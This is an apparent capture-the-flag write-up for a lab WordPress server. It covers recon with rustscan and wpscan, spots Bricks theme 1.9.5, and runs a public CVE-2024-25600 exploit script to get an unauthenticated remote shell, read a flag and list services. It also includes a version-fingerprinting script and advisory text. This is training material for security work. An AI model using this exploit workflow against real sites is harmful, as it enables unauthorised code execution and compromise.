From Three Million Bricks to Three Million Transactions!
Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they’ve lost access.
Can you hack back the server and identify what happened there?
Note: Add 10.10.18.83 bricks.thm to your /etc/hosts file.
Questions
Question 01
What is the content of the hidden .txt file in the web folder?
Recon
┌──(0xneobyte㉿0xNeoShell)-[~]
└─$ rustscan -a 10.10.18.83 --ulimit 5000 -- -Pn -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.
[~] The config file is expected to be at "/home/0xneobyte/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.18.83:22
Open 10.10.18.83:80
Open 10.10.18.83:443
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -Pn -sC -sV" on ip 10.10.18.83
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-26 13:40 +0530
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:40
Completed Parallel DNS resolution of 1 host. at 13:40, 1.48s elapsed
DNS resolution of 1 IPs took 1.48s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:40
Scanning 10.10.18.83 [3 ports]
Discovered open port 443/tcp on 10.10.18.83
Discovered open port 22/tcp on 10.10.18.83
Discovered open port 80/tcp on 10.10.18.83
Completed SYN Stealth Scan at 13:40, 0.22s elapsed (3 total ports)
Initiating Service scan at 13:40
Scanning 3 services on 10.10.18.83
Completed Service scan at 13:40, 18.91s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.18.83.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:41, 8.95s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 2.53s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 0.00s elapsed
Nmap scan report for 10.10.18.83
Host is up, received user-set (0.20s latency).
Scanned at 2025-02-26 13:40:39 +0530 for 30s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6b:b2:d7:43:62:71:23:9b:1f:df:63:ec:63:7e:88:e3 (RSA)
| 256 a5:c0:8d:c1:73:fe:8d:cc:b5:7a:16:63:63:12:42:98 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGBdYHnPCRJOT2032Fyq5TCyQIjEQg4WZiVF/sPEI6+a8TuKLS1mqOfi+AijsrskcjpPnsoz7VEPDYldxRss0hE=
| 256 8c:76:63:28:e4:3a:04:10:4f:8e:67:f9:5b:c0:27:dd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIElMNAW6p7O2ck5To/C00G3XXcuznsRvJF/iUN9NH8fs
80/tcp open http syn-ack ttl 63 Python http.server 3.5 - 3.10
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp open ssl/http syn-ack ttl 63 Apache httpd
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-04-02T11:59:14
| Not valid after: 2025-04-02T11:59:14
| MD5: f1df:99bc:d5ab:5a5a:5709:5099:4add:a385
| SHA-1: 1f26:54bb:e2c5:b4a1:1f62:5ea0:af00:0261:35da:23c3
| -----BEGIN CERTIFICATE-----
| MIIDazCCAlOgAwIBAgIUPbOGG+Xi6dsd8rNRzG/wI3DvA8MwDQYJKoZIhvcNAQEL
| BQAwRTELMAkGA1UEBhMCVVMxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
| GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yNDA0MDIxMTU5MTRaFw0yNTA0
| MDIxMTU5MTRaMEUxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
| HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQCtzw+eboW61zIzd/tl7LdrZCO86nc/MN0DkZfTngO7
| lJq/VQgR617FfExm26yI+wZSEkUWO5dg+1BYJbkYlayzr0Dyor3E2l73dIsM2Ur4
| s6hET6gYFD8pCu9z6YvMqxcq/1YWN+pOGsicAFeT6t8uQBYyA9NZZXSAISnorUbV
| aRW/Z8cwijQquIfwIiBaVhOnqBAqoudHQ5yLb461PGgVpioNeS9DDe3I7+J5LPe7
| va5wcnTJ2xfKrCHIPipuAgj5lCJ7lihlvT0KDB1elFxy5yIPABR5MthRs36eiO4+
| 1AKfPDVrvC5IpBvycgT95qhR0AnS+N9CwmO4HUWq5AJtAgMBAAGjUzBRMB0GA1Ud
| DgQWBBQHb6dwgvFLizbay0+nIgxlfzZYtjAfBgNVHSMEGDAWgBQHb6dwgvFLizba
| y0+nIgxlfzZYtjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBJ
| gjQinsS5AIb/LJT4KVhHgDAVezICOx3kg6foyMV3z6CcU9e6QLuMpyMCR/UGqUqs
| m0iJH8sR1jJdS3tDPTEmJXW8gBux3Y4xl9/A1sMhm97O5O7KHiBiwiW47Pwfo4/a
| wchcSEcU/4jfivY7ifGcIBSN4GInUHjwfD63J0/LHh1GPEo/Wsoekk0586psicaV
| dv3UqrFcLFztwKGDgs+51Oc9a70xT96bko0huCZ1NFOh4zchZ3kno9mueURi/SJO
| ibgwFMBWO7mQHKnlnQxxQwxER+QyftgnO+gXvkPGQU+o4rMnjHX5EAjyfoutRjjN
| tQWUR7AJRMC+3VGdRcVV
|_-----END CERTIFICATE-----
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Brick by Brick
|_http-server-header: Apache
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:41
Completed NSE at 13:41, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.48 seconds
Raw packets sent: 3 (132B) | Rcvd: 224 (8.972KB)
So it's basically a WordPress site. When I inspect the source code, it's using the theme "bricks", and the room name is also Bricks, so that's something SUS:
<script src="https://bricks.thm/wp-content/themes/bricks/assets/js/bricks.min.js?ver=1705030332" id="bricks-scripts-js"></script>
So I'm going to scan this with wpscan and look for more info:
┌──(0xneobyte㉿0xNeoShell)-[~]
└─$ wpscan --url https://bricks.thm --disable-tls-checks
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: https://bricks.thm/ [10.10.18.83]
[+] Started: Wed Feb 26 14:20:03 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: server: Apache
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: https://bricks.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://bricks.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://bricks.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://bricks.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.5 identified (Insecure, released on 2024-04-02).
| Found By: Rss Generator (Passive Detection)
| - https://bricks.thm/feed/, <generator>https://wordpress.org/?v=6.5</generator>
| - https://bricks.thm/comments/feed/, <generator>https://wordpress.org/?v=6.5</generator>
[+] WordPress theme in use: bricks
| Location: https://bricks.thm/wp-content/themes/bricks/
| Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
| Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
| Style Name: Bricks
| Style URI: https://bricksbuilder.io/
| Description: Visual website builder for WordPress....
| Author: Bricks
| Author URI: https://bricksbuilder.io/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.9.5 (80% confidence)
| Found By: Style (Passive Detection)
| - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:10 <=====================================> (137 / 137) 100.00% Time: 00:00:10
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 26 14:20:28 2025
[+] Requests Done: 170
[+] Cached Requests: 7
[+] Data Sent: 42.345 KB
[+] Data Received: 110.502 KB
[+] Memory used: 271.395 MB
[+] Elapsed time: 00:00:25
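As an added example (mine, not part of the original writeup and not WPScan's code), here is the passive fingerprinting step that WPScan performed above done by hand: pull the theme slug out of the `/wp-content/themes/<slug>/` asset URLs in the page source, read the `Version:` field from the theme's `style.css` header, and compare it against the affected range quoted in the advisory text later on this page (Bricks up to and including 1.9.6). The HTML and style.css samples are constructed to mirror what the page shows; the function names are my own. The same check, run over your own site inventory, is how a defender finds the unpatched copies.

```python
import re

# Constructed sample inputs (stand-ins for the target's page source and
# style.css; the script tag mirrors the one quoted above, the rest is made up).
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://bricks.thm/wp-content/themes/bricks/style.css?ver=1705030332">
<script src="https://bricks.thm/wp-content/themes/bricks/assets/js/bricks.min.js?ver=1705030332" id="bricks-scripts-js"></script>
<meta name="generator" content="WordPress 6.5">
</head><body></body></html>"""

SAMPLE_STYLE_CSS = """/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Description: Visual website builder for WordPress.
Author: Bricks
Version: 1.9.5
*/"""

THEME_PATH_RE = re.compile(r"/wp-content/themes/([A-Za-z0-9_.-]+)/")


def theme_slugs(html: str) -> list[str]:
    """Theme directory names referenced by asset URLs in the page source."""
    return sorted(set(THEME_PATH_RE.findall(html)))


def style_header(css: str) -> dict[str, str]:
    """Parse the 'Key: Value' header block WordPress requires in a theme's style.css."""
    header = {}
    for line in css.splitlines():
        m = re.match(r"^\s*([A-Za-z][A-Za-z ]*?):\s*(.+?)\s*$", line)
        if m:
            header[m.group(1).strip()] = m.group(2)
    return header


def version_tuple(version: str) -> tuple[int, ...]:
    """'1.9.5' -> (1, 9, 5); a non-numeric tail such as '-beta' is dropped."""
    parts = []
    for piece in version.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def affected_by_cve_2024_25600(theme: str, version: str) -> bool:
    """Bricks <= 1.9.6 is the affected range stated in the advisory text on this page."""
    return theme.lower() == "bricks" and version_tuple(version) <= (1, 9, 6)


def fingerprint(html: str, css: str) -> dict:
    """Combine both sources into one verdict, the way a passive scan does."""
    slugs = theme_slugs(html)
    version = style_header(css).get("Version", "")
    affected = bool(version) and any(affected_by_cve_2024_25600(s, version) for s in slugs)
    return {"themes": slugs, "version": version, "affected": affected}


if __name__ == "__main__":
    print(fingerprint(SAMPLE_HTML, SAMPLE_STYLE_CSS))
```

The version comparison is tuple-based on purpose: a four-part release such as 1.9.6.1 sorts above (1, 9, 6) and is therefore outside the affected range, which a string comparison would get wrong.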
And yeah, we found the version of the Bricks theme used on the website, so I googled "wordpress bricks Version: 1.9.5 vuln" and found a GitHub repo: https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
Exploit :
CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE) 🌐
The Bricks theme for WordPress has been identified as vulnerable to a critical security flaw known as CVE-2024-25600. This vulnerability affects all versions up to, and including, 1.9.6 of the Bricks Builder plugin. It poses a significant risk as it allows unauthenticated attackers to execute arbitrary code remotely on the server hosting the vulnerable WordPress site. CVE-2024-25600 is classified under Remote Code Execution (RCE) vulnerabilities, enabling attackers to manipulate the server into executing malicious code without any authentication. This vulnerability exploits a flaw in the Bricks Builder plugin’s handling of user input, allowing attackers to inject and execute PHP code remotely. The exploitation of this vulnerability can lead to full site compromise, data theft, and potential spreading of malware to site visitors.
Impact ⚠️
The impact of CVE-2024-25600 is severe due to several factors:
- Unauthenticated Access: The exploit can be carried out without any authenticated session or user credentials, making every website running a vulnerable version of the Bricks Builder plugin an easy target.
- Remote Code Execution: Successful exploitation allows attackers to execute arbitrary code on the server, providing the capability to modify website content, steal sensitive data, and gain unauthorized access to the hosting environment.
- Widespread Risk: Given the popularity of the Bricks Builder plugin among WordPress users for its design flexibility, a significant number of websites are at risk until patched.
Mitigation Steps 🔒
To mitigate the risk posed by CVE-2024-25600, website administrators and security teams should immediately take the following steps:
- Update the Plugin: Upgrade the Bricks Builder plugin to the latest version immediately. The developers have released patches addressing this vulnerability in versions following 1.9.6.
- Security Review: Conduct a thorough security review of your website to ensure no unauthorized modifications have been made.
- Regular Monitoring: Implement regular monitoring of web logs for any suspicious activity that could indicate exploitation attempts or successful breaches.
- Security Best Practices: Adhere to security best practices for WordPress sites, including using strong passwords, limiting login attempts, and using security plugins to monitor and protect your site.
Disclaimer 🚫
Here’s a Proof of Concept (PoC) for educational and security research purposes only. The use of the information provided is at your own risk. The author or contributors do not encourage unethical or illegal activity. Ensure you have explicit permission before testing any system with the techniques and code described.
To run this we need to install the dependencies:
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install alive-progress
Collecting alive-progress
Downloading alive_progress-3.2.0-py3-none-any.whl.metadata (70 kB)
Collecting about-time==4.2.1 (from alive-progress)
Downloading about_time-4.2.1-py3-none-any.whl.metadata (13 kB)
Collecting grapheme==0.6.0 (from alive-progress)
Downloading grapheme-0.6.0.tar.gz (207 kB)
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Downloading alive_progress-3.2.0-py3-none-any.whl (77 kB)
Downloading about_time-4.2.1-py3-none-any.whl (13 kB)
Building wheels for collected packages: grapheme
Building wheel for grapheme (pyproject.toml) ... done
Created wheel for grapheme: filename=grapheme-0.6.0-py3-none-any.whl size=210137 sha256=8cb63f0205c6694df52ddcb8a3c665f2e7e7404c3480ba26db8df3ac3c5c2aeb
Stored in directory: /home/0xneobyte/.cache/pip/wheels/e0/96/66/ab223d7755e401981953430b7f2d562afba01a71296a74c893
Successfully built grapheme
Installing collected packages: grapheme, about-time, alive-progress
Successfully installed about-time-4.2.1 alive-progress-3.2.0 grapheme-0.6.0
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ ls
CVE-2024-25600.py myenv README.md
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
Traceback (most recent call last):
File "/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py", line 4, in <module>
import requests
ModuleNotFoundError: No module named 'requests'
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install requests
Collecting requests
Downloading requests-2.32.3-py3-none-any.whl.metadata (4.6 kB)
Collecting charset-normalizer<4,>=2 (from requests)
Downloading charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl.metadata (35 kB)
Collecting idna<4,>=2.5 (from requests)
Downloading idna-3.10-py3-none-any.whl.metadata (10 kB)
Collecting urllib3<3,>=1.21.1 (from requests)
Downloading urllib3-2.3.0-py3-none-any.whl.metadata (6.5 kB)
Collecting certifi>=2017.4.17 (from requests)
Downloading certifi-2025.1.31-py3-none-any.whl.metadata (2.5 kB)
Downloading requests-2.32.3-py3-none-any.whl (64 kB)
Downloading certifi-2025.1.31-py3-none-any.whl (166 kB)
Downloading charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl (140 kB)
Downloading idna-3.10-py3-none-any.whl (70 kB)
Downloading urllib3-2.3.0-py3-none-any.whl (128 kB)
Installing collected packages: urllib3, idna, charset-normalizer, certifi, requests
Successfully installed certifi-2025.1.31 charset-normalizer-3.4.1 idna-3.10 requests-2.32.3 urllib3-2.3.0
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ ping 10.10.152.127
PING 10.10.152.127 (10.10.152.127) 56(84) bytes of data.
64 bytes from 10.10.152.127: icmp_seq=1 ttl=63 time=221 ms
^C
--- 10.10.152.127 ping statistics ---
2 packets transmitted, 1 received, 50% packet loss, time 1002ms
rtt min/avg/max/mdev = 220.662/220.662/220.662/0.000 ms
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ sudo nano /etc/hosts
[sudo] password for 0xneobyte:
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ ls
CVE-2024-25600.py myenv README.md
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
Traceback (most recent call last):
File "/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py", line 7, in <module>
from bs4 import BeautifulSoup
ModuleNotFoundError: No module named 'bs4'
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install bs4
Collecting bs4
Downloading bs4-0.0.2-py2.py3-none-any.whl.metadata (411 bytes)
Collecting beautifulsoup4 (from bs4)
Downloading beautifulsoup4-4.13.3-py3-none-any.whl.metadata (3.8 kB)
Collecting soupsieve>1.2 (from beautifulsoup4->bs4)
Downloading soupsieve-2.6-py3-none-any.whl.metadata (4.6 kB)
Collecting typing-extensions>=4.0.0 (from beautifulsoup4->bs4)
Downloading typing_extensions-4.12.2-py3-none-any.whl.metadata (3.0 kB)
Downloading bs4-0.0.2-py2.py3-none-any.whl (1.2 kB)
Downloading beautifulsoup4-4.13.3-py3-none-any.whl (186 kB)
Downloading soupsieve-2.6-py3-none-any.whl (36 kB)
Downloading typing_extensions-4.12.2-py3-none-any.whl (37 kB)
Installing collected packages: typing-extensions, soupsieve, beautifulsoup4, bs4
Successfully installed beautifulsoup4-4.13.3 bs4-0.0.2 soupsieve-2.6 typing-extensions-4.12.2
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install bs4
Requirement already satisfied: bs4 in ./myenv/lib/python3.13/site-packages (0.0.2)
Requirement already satisfied: beautifulsoup4 in ./myenv/lib/python3.13/site-packages (from bs4) (4.13.3)
Requirement already satisfied: soupsieve>1.2 in ./myenv/lib/python3.13/site-packages (from beautifulsoup4->bs4) (2.6)
Requirement already satisfied: typing-extensions>=4.0.0 in ./myenv/lib/python3.13/site-packages (from beautifulsoup4->bs4) (4.12.2)
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
Traceback (most recent call last):
File "/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py", line 8, in <module>
from rich.console import Console
ModuleNotFoundError: No module named 'rich'
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install rich
Collecting rich
Downloading rich-13.9.4-py3-none-any.whl.metadata (18 kB)
Collecting markdown-it-py>=2.2.0 (from rich)
Downloading markdown_it_py-3.0.0-py3-none-any.whl.metadata (6.9 kB)
Collecting pygments<3.0.0,>=2.13.0 (from rich)
Downloading pygments-2.19.1-py3-none-any.whl.metadata (2.5 kB)
Collecting mdurl~=0.1 (from markdown-it-py>=2.2.0->rich)
Downloading mdurl-0.1.2-py3-none-any.whl.metadata (1.6 kB)
Downloading rich-13.9.4-py3-none-any.whl (242 kB)
Downloading markdown_it_py-3.0.0-py3-none-any.whl (87 kB)
Downloading pygments-2.19.1-py3-none-any.whl (1.2 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 MB 1.2 MB/s eta 0:00:00
Downloading mdurl-0.1.2-py3-none-any.whl (10.0 kB)
Installing collected packages: pygments, mdurl, markdown-it-py, rich
Successfully installed markdown-it-py-3.0.0 mdurl-0.1.2 pygments-2.19.1 rich-13.9.4
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
Traceback (most recent call last):
File "/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py", line 9, in <module>
from prompt_toolkit import PromptSession, HTML
ModuleNotFoundError: No module named 'prompt_toolkit'
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ pip install prompt_toolkit
Collecting prompt_toolkit
Downloading prompt_toolkit-3.0.50-py3-none-any.whl.metadata (6.6 kB)
Collecting wcwidth (from prompt_toolkit)
Downloading wcwidth-0.2.13-py2.py3-none-any.whl.metadata (14 kB)
Downloading prompt_toolkit-3.0.50-py3-none-any.whl (387 kB)
Downloading wcwidth-0.2.13-py2.py3-none-any.whl (34 kB)
Installing collected packages: wcwidth, prompt_toolkit
Successfully installed prompt_toolkit-3.0.50 wcwidth-0.2.13
For the first flag, here it is:
┌──(myenv)─(0xneobyte㉿0xNeoShell)-[~/CVE-2024-25600-EXPLOIT]
└─$ python CVE-2024-25600.py -u https://bricks.thm
/home/0xneobyte/CVE-2024-25600-EXPLOIT/CVE-2024-25600.py:18: SyntaxWarning: invalid escape sequence '\ '
color.print("""[yellow]
_______ ________ ___ ____ ___ __ __ ___ ___________ ____ ____
/ ____/ | / / ____/ |__ \ / __ \__ \/ // / |__ \ / ____/ ___// __ \/ __ \
/ / | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / / /
/ /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ __/____/ / /_/ / /_/ / /_/ /
\____/ |___/_____/ /____/\____/____/ /_/ /____/_____/\____/\____/\____/
Coded By: K3ysTr0K3R --> Hello, Friend!
[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://bricks.thm
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell> pwd
/data/www/default
Shell> ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Shell> head 650c844110baced87e1606453b93f22a.txt
THM{fl46_650c844110baced87e1606453b93f22a}
Question 02
What is the name of the suspicious process?
Shell> systemctl list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
apparmor.service loaded active exited Load AppArmor profiles
apport.service loaded active exited LSB: automatic crash report generation
atd.service loaded active running Deferred execution scheduler
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
badr.service loaded active running My startup script
blk-availability.service loaded active exited Availability of block devices
cloud-config.service loaded active exited Apply the settings specified in cloud-config
cloud-final.service loaded active exited Execute cloud user/final scripts
cloud-init-local.service loaded active exited Initial cloud-init job (pre-networking)
cloud-init.service loaded active exited Initial cloud-init job (metadata service crawler)
console-setup.service loaded active exited Set console font and keymap
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
cups.service loaded active running CUPS Scheduler
dbus.service loaded active running D-Bus System Message Bus
finalrd.service loaded active exited Create final runtime dir for shutdown pivot root
getty@tty1.service loaded active running Getty on tty1
hddtemp.service loaded active exited LSB: disk temperature monitoring daemon
httpd.service loaded active running LSB: starts Apache Web Server
ifupdown-pre.service loaded active exited Helper to synchronize boot up for ifupdown
irqbalance.service loaded active running irqbalance daemon
kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures
keyboard-setup.service loaded active exited Set the console keyboard layout
kmod-static-nodes.service loaded active exited Create list of static device nodes for the current kernel
lightdm.service loaded active running Light Display Manager
● logrotate.service loaded failed failed Rotate log files
lvm2-monitor.service loaded active exited Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling
ModemManager.service loaded active running Modem Manager
multipathd.service loaded active running Device-Mapper Multipath Device Controller
mysqld.service loaded active running LSB: start and stop MySQL
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
networking.service loaded active exited Raise network interfaces
NetworkManager-wait-online.service loaded active exited Network Manager Wait Online
NetworkManager.service loaded active running Network Manager
openvpn.service loaded active exited OpenVPN service
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service
serial-getty@ttyS0.service loaded active running Serial Getty on ttyS0
setvtrgb.service loaded active exited Set console scheme
snap.amazon-ssm-agent.amazon-ssm-agent.service loaded active running Service for snap application amazon-ssm-agent.amazon-ssm-agent
snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd
snapd.seeded.service loaded active exited Wait until snapd is fully seeded
snapd.service loaded active running Snap Daemon
ssh.service loaded active running OpenBSD Secure Shell server
switcheroo-control.service loaded active running Switcheroo Control Proxy service
systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-modules-load.service loaded active exited Load Kernel Modules
systemd-networkd-wait-online.service loaded active exited Wait for Network to be Configured
systemd-networkd.service loaded active running Network Service
systemd-random-seed.service loaded active exited Load/Save Random Seed
systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems
systemd-resolved.service loaded active running Network Name Resolution
systemd-sysctl.service loaded active exited Apply Kernel Variables
systemd-sysusers.service loaded active exited Create System Users
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev
systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories
systemd-udev-settle.service loaded active exited udev Wait for Complete Device Initialization
systemd-udev-trigger.service loaded active exited udev Coldplug all Devices
systemd-udevd.service loaded active running udev Kernel Device Manager
